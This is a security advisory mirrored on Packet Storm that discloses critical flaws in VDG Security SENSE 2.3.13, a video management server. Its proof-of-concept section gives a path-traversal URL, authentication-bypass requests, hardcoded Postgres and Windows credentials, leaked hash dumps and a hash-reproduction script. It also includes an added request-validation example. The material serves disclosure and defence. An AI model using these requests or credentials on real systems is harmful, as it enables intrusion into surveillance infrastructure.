VDG Security SENSE 2.3.13 File Disclosure / Bypass / Buffer Overflow

2014-12-19T00:00:00
ID PACKETSTORM:129656
Type packetstorm
Reporter Stefan Viehbock
Modified 2014-12-19T00:00:00

Description

SEC Consult Vulnerability Lab Security Advisory < 20141218-0 >  
=======================================================================  
title: Multiple critical vulnerabilities  
product: VDG Security SENSE (formerly DIVA)  
vulnerable version: 2.3.13  
fixed version: unknown - no vendor confirmation  
impact: critical  
homepage: https://vdgsecurity.com/  
found: 2014-10-01  
by: Stefan Viehböck  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor description:  
-------------------  
"VDG Sense is our video management system (VMS). VDG Sense gives you control  
of all live images and stored video data, in a user-friendly interface. Our  
solution is based on an open platform, tailored to your specific needs and  
requirements and ready to be integrated in any security solution."  
Source: https://vdgsecurity.com/sense/  
  
"DIVA is our former trademark, which we used to brand our video management  
software and other VDG products. With the launch of our new trademark, VDG  
Sense, we have rebranded the software to VDG Sense and promote it as such  
from September 15, 2014. Other products, such as our servers, are available  
under the label VDG."  
Source: https://vdgsecurity.com/diva/  
  
  
Business recommendation:  
------------------------  
Attackers are able to completely compromise the VDG SENSE server as they can  
gain access at the system level. The SENSE server can then be used as an entry point  
into the target infrastructure (lateral movement, privilege escalation).  
  
It is highly recommended by SEC Consult not to use this software until a  
thorough security review has been performed by security professionals and all  
identified issues have been resolved.  
  
Although the vendor does not respond to our mails any more, some  
vulnerabilities seem to be fixed in the most recent version of SENSE (2.3.15).  
It is assumed that further critical vulnerabilities exist.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Unauthenticated local file disclosure  
Unauthenticated users can read arbitrary files from the filesystem with the  
privileges of the "SYSTEM" operating system user. These files include  
configuration files containing sensitive information such as clear text  
passwords/password hashes which can be used in further attacks.  
  
  
2) Authentication bypass / Clear text password disclosure  
Some parts of the DIVA application are vulnerable to authentication bypass. This  
allows attackers to update the DIVA plugin configuration. Furthermore, DIVA plugin  
configurations can be read. This configuration includes clear text DIVA  
administrator credentials, as DIVA plugins require access to such an account  
for operation.  
  
  
3) Insecure service configuration / Hardcoded default credentials - Postgres  
The PostgreSQL database is offered via the network (TCP port 5432) and can be  
accessed remotely using hardcoded credentials which can't be changed.  
  
  
4) Hardcoded default credentials - Windows Users  
Several local Windows users are created in the course of the DIVA setup. These  
are used to run some of the DIVA services. These users can be used to log on to the  
server running DIVA.  
  
  
5) Critical information disclosure / User database leakage  
After authentication with the DIVA (fat) client via the proprietary protocol  
(TCP port 51410) the server returns the contents of the user database  
to the client. This works regardless of whether the user has administrator  
rights or not.  
The user database (users.ini) contains all users and their password hashes.  
This information is sufficient to log in as another user. An attacker does not  
require knowledge about plain text passwords.  
  
  
6) Use of plain text protocols  
All DIVA communication transport channels (e.g. via TCP ports 80 and 51410) lack  
encryption.  
  
  
7) Buffer overflow vulnerabilities  
The DIVA web service API (/webservice) is vulnerable to a stack based buffer  
overflow when processing "AuthenticateUser" requests. Both the "user" and the  
"password" parameter are vulnerable.  
None of the DIVA modules are ASLR-enabled. An exploit that uses ROP to bypass  
DEP has been implemented.  
  
  
Proof of concept:  
-----------------  
1) Unauthenticated local file disclosure  
Arbitrary files can be downloaded because of vulnerabilities in the proprietary  
web server implementation. An example for x64 hosts:  
http://<host>/images/../../../../Windows/SysWOW64/config/systemprofile/AppData/Roaming/Diva/Settings/users.ini  
  
Interesting DIVA-specific files:  
config/systemprofile/AppData/Roaming/Diva/Settings/users.ini (DIVA user database)  
config/systemprofile/AppData/Roaming/Diva/DivaManager/DivaManager.ini (contains DIVA  
"master user")  
config/systemprofile/AppData/Roaming/Diva/DivaManager/Plugins/ (DIVA plugin  
configurations)  
[...]  
  
  
2) Authentication bypass / Clear text password disclosure  
Authentication for parts of the application can be bypassed by sending the HTTP  
Authorization header containing a colon ":".  
  
GET /plugins/divacal/getsettings?sessionkey= HTTP/1.1  
Host: <host>  
Authorization: Basic Og==  
  
The response contains the plugin configuration for "divacal":  
  
HTTP/1.1 200 OK  
Date: Thu, 23 Okt 2014 10:46:28 GMT  
Server: Diva HTTP Plugin 2.0  
Accept-Ranges: bytes  
Connection: Keep-Alive  
Content-Type: application/xml; charset=UTF-8  
Content-Length: 1179  
  
<?xml version="1.0" ?>  
<?xml-stylesheet type="text/xsl" href="../../xml/settings.xsl" ?>  
<settings>  
<name>DivaCal settings</name>  
<group>  
<id>0</id>  
<name>DIVA Connection</name>  
<singleinstance>yes</singleinstance>  
<showbuttons>yes</showbuttons>  
<subgroup>  
[...]  
<setting>  
<id>1</id>  
<name>DIVAUsername</name>  
<type>string</type>  
<value>Administrator</value>  
<default>Administrator</default>  
<help>The username used to login to to the DIVA management server.</help>  
</setting>  
<setting>  
<id>2</id>  
<name>DIVAPassword</name>  
<type>password</type>  
<value>!DVadmin</value>  
<default>!DVadmin</default>  
<help>The password required to login to the DIVA management server.</help>  
</setting>  
</subgroup>  
</group>  
</settings>  
  
Other activated plugins can be queried via the following request:  
GET /plugins/?sessionkey= HTTP/1.1  
Host: <host>  
Authorization: Basic Og==  
  
  
Plugin settings can be updated as follows:  
POST /plugins/http/updatesettings?sessionkey= HTTP/1.1  
Host: <host>  
Authorization: Basic Og==  
Content-Length: 29  
  
groupid=0&DocumentRoot=htdocs  
  
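The two web server flaws above (1: path traversal outside the document root, 2: an Authorization header whose decoded value is only ":") are what a hardened request handler has to refuse. The following is an added example, not code from the advisory or from VDG; it assumes a document root of /htdocs (the value the updatesettings request above sets) and runs over constructed sample requests, the second of which reuses the advisory's traversal URL.

```python
import base64
import posixpath
from urllib.parse import unquote

# Constructed sample requests (not from the advisory's captures): (URL path, Authorization header).
SAMPLE_REQUESTS = [
    ("/images/logo.png", "Basic YWRtaW46c2VjcmV0"),  # admin:secret, constructed credentials
    ("/images/../../../../Windows/SysWOW64/config/systemprofile/AppData/Roaming/Diva/Settings/users.ini", None),
    ("/plugins/divacal/getsettings?sessionkey=", "Basic Og=="),  # base64(":"), the bypass header
    ("/plugins/divacal/getsettings?sessionkey=", "Basic YWRtaW4="),  # "admin" with no colon at all
]

def resolve_under_docroot(url_path, docroot="/htdocs"):
    """Map a URL path to a file below docroot, or return None if it escapes.
    Normalising first and then checking the prefix is the check that catches
    the '..' walk the advisory's web server served without complaint."""
    path_only = unquote(url_path.split("?", 1)[0])
    if "\\" in path_only:  # a Windows host would treat this as a separator as well
        return None
    resolved = posixpath.normpath(posixpath.join(docroot, path_only.lstrip("/")))
    if resolved != docroot and not resolved.startswith(docroot + "/"):
        return None
    return resolved

def basic_auth_credentials(header):
    """Return (user, password) from an HTTP Basic header, or None if either part is
    empty or the header is malformed. 'Basic Og==' decodes to ':' and therefore
    yields an empty user and an empty password, which the plugin endpoints accepted."""
    if not header or not header.startswith("Basic "):
        return None
    try:
        decoded = base64.b64decode(header[6:], validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    user, sep, password = decoded.partition(":")
    if not sep or not user or not password:
        return None
    return user, password

def audit(requests):
    """One verdict per (path, header) pair: the two checks a hardened server would apply."""
    verdicts = []
    for path, auth in requests:
        if resolve_under_docroot(path) is None:
            verdicts.append("reject: path traversal")
        elif path.startswith("/plugins/") and basic_auth_credentials(auth) is None:
            verdicts.append("reject: missing or empty credentials")
        else:
            verdicts.append("allow")
    return verdicts

if __name__ == "__main__":
    for req, verdict in zip(SAMPLE_REQUESTS, audit(SAMPLE_REQUESTS)):
        print(verdict, "<-", req[0])
```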
  
3) Insecure service configuration / Hardcoded default credentials - Postgres  
The Postgres root user is as follows:  
  
Username: root  
Password: ArpaRomaWi  
  
  
4) Hardcoded default credentials - Windows Users  
The created Windows users are as follows:  
  
Username: postgres  
Password: !DVService  
  
Username: NTP  
Password: !DVService  
  
  
5) Critical information disclosure / User database leakage  
Below is an excerpt from the DIVA protocol communication (TCP port 51410):  
00000000 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 H....... ........ <- SERVER  
00000010 00 00 00 00 0d 00 00 20 01 00 02 20 03 00 00 20 ....... ... ...  
00000020 06 00 11 00 32 2e 33 2e 31 33 00 00 02 00 00 20 ....2.3. 13.....  
00000030 01 00 02 40 04 00 00 00 04 00 00 20 06 00 11 00 ...@.... ... ....  
00000040 44 69 76 61 20 73 65 72 76 65 72 00 Diva ser ver.  
00000000 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ <- CLIENT  
00000010 00 00 00 00 29 00 00 20 c9 00 02 40 05 00 00 20 ....).. ...@...  
Note: client sends passwordHash and digestHash  
00000020 f6 01 01 40 61 64 6d 69 6e 69 73 74 72 61 74 6f ...@admi nistrato  
00000030 72 00 00 00 09 00 00 20 f7 01 01 40 49 41 68 6b r...... ...@IAhk  
00000040 43 72 33 61 68 7a 59 39 67 53 57 73 56 37 33 6b Cr3ahzY9 gSWsV73k  
00000050 41 42 32 64 51 79 38 3d 00 00 00 00 0a 00 00 20 AB2dQy8= .......  
00000060 fa 01 01 40 35 34 38 31 35 36 32 31 38 64 33 65 ...@5481 56218d3e  
00000070 31 63 35 35 66 63 30 30 35 65 38 32 61 32 32 30 1c55fc00 5e82a220  
00000080 61 34 63 30 00 00 00 00 02 00 00 20 05 00 11 40 a4c0.... ... ...@  
00000090 02 00 00 00 03 00 00 20 0b 00 11 40 00 00 00 00 ....... ...@....  
000000A0 00 00 00 00 02 00 00 20 0f 00 11 40 00 00 00 00 ....... ...@....  
000000B0 02 00 00 20 02 00 11 40 00 00 00 00 ... ...@ ....  
0000004C 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0....... ........ <- SERVER  
0000005C 00 00 00 00 07 00 00 20 ca 00 02 40 02 00 00 20 ....... ...@...  
0000006C f5 01 01 40 01 00 00 00 02 00 00 20 02 00 11 40 ...@.... ... ...@  
0000007C 01 00 00 00 ....  
000000BC 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 P....... ........ <- CLIENT  
000000CC 00 00 00 00 0f 00 00 20 01 00 1c 40 0b 00 00 20 ....... ...@...  
000000DC 02 00 1c 40 47 45 54 20 2f 75 73 65 72 6d 61 6e ...@GET /userman  
000000EC 61 67 65 6d 65 6e 74 2f 6f 73 64 73 74 79 6c 65 agement/ osdstyle  
000000FC 73 20 44 49 56 41 2f 31 2e 30 00 00 01 00 00 20 s DIVA/1 .0.....  
0000010C 03 00 1c 40 ...@  
00000080 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $....... ........ <- SERVER  
00000090 00 00 00 00 04 00 00 20 07 01 11 40 02 00 00 20 ....... ...@...  
000000A0 06 00 11 00 00 00 00 00 24 00 00 00 00 00 00 00 ........ $.......  
[...]  
00000200 9c 02 01 40 02 00 00 20 06 00 11 00 0d 0a 00 00 ...@... ........  
00000210 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........  
00000220 00 00 00 00 2a 00 00 20 f4 01 01 40 28 00 00 20 ....*.. ...@(..  
00000230 06 00 11 00 5b 61 64 6d 69 6e 69 73 74 72 61 74 ....[adm inistrat -----  
00000240 6f 72 5d 0d 0a 61 64 6d 69 6e 72 69 67 68 74 73 or]..adm inrights |  
00000250 3d 31 0d 0a 61 6e 64 72 6f 69 64 3d 0d 0a 64 69 =1..andr oid=..di |  
00000260 67 65 73 74 48 61 73 68 3d 35 34 38 31 35 36 32 gestHash =5481562 |  
00000270 31 38 64 33 65 31 63 35 35 66 63 30 30 35 65 38 18d3e1c5 5fc005e8 |  
00000280 32 61 32 32 30 61 34 63 30 0d 0a 65 6d 61 69 6c 2a220a4c 0..email | <- DIVA user database  
00000290 3d 0d 0a 66 75 6c 6c 6e 61 6d 65 3d 0d 0a 69 6f =..fulln ame=..io |  
000002A0 73 3d 0d 0a 70 61 73 73 77 6f 72 64 3d 49 41 68 s=..pass word=IAh |  
000002B0 6b 43 72 33 61 68 7a 59 39 67 53 57 73 56 37 33 kCr3ahzY 9gSWsV73 |  
000002C0 6b 41 42 32 64 51 79 38 3d 0d 0a 0d 0a 00 00 00 kAB2dQy8 =....... -----  
000002D0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $....... ........  
  
For the sake of completeness the password hashing scheme has been reverse  
engineered. As both hashes can be used for authentication directly, brute  
force attacks against password hashes are not required.  
  
#!/usr/bin/env python3  
import hashlib  
from base64 import b64encode  
  
user = 'administrator'  
password = '!DVadmin'  
  
# digestHash: MD5 over "user:DIVA:password", hex encoded, upper case  
digestHash = hashlib.md5((user + ":DIVA:" + password).encode()).hexdigest().upper()  
# passwordHash: base64 of SHA1(SHA1(password)), raw digests chained  
passwordHash = b64encode(hashlib.sha1(hashlib.sha1(password.encode()).digest()).digest()).decode()  
  
print('digestHash', digestHash)  
print('passwordHash', passwordHash)  
  
  
6) Use of plain text protocols  
No proof of concept necessary.  
  
  
7) Buffer overflow vulnerabilities  
Detailed proof of concept exploits have been removed for this vulnerability.  
  
  
  
Vulnerable / tested versions:  
-----------------------------  
The vulnerabilities have been verified to exist in 2.3.13, which was the most  
recent version at the time of discovery.  
  
  
  
Vendor contact timeline:  
------------------------  
2014-10-24: Sending responsible disclosure policy and requesting encryption  
keys.  
2014-10-28: Vendor responds, provides encryption keys.  
2014-10-29: Sending advisory and proof of concept exploit via encrypted  
channel.  
2014-10-29: Vendor confirms receipt of advisory.  
2014-11-10: Requesting status update.  
2014-11-17: Vendor states that team is "very well on track to solve the  
issues".  
2014-11-18: Clarifying criticality of vulnerabilities and viability of attack,  
even in closed networks; referring to Shodan search results.  
2014-12-10: Requesting status update. No reply.  
2014-12-18: SEC Consult releases security advisory.  
  
  
Solution:  
---------  
It seems some of the vulnerabilities are fixed in the most recent version of  
SENSE (2.3.15). The vendor stopped responding to our emails so we don't know  
what vulnerabilities were actually fixed.  
  
  
Workaround:  
-----------  
No workaround available.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich  
  
Headquarter:  
Mooslackengasse 17, 1190 Vienna, Austria  
Phone: +43 1 8903043 0  
Fax: +43 1 8903043 15  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
Interested in working with the experts of SEC Consult?  
Write to career@sec-consult.com  
  
EOF Stefan Viehböck / @2014  
  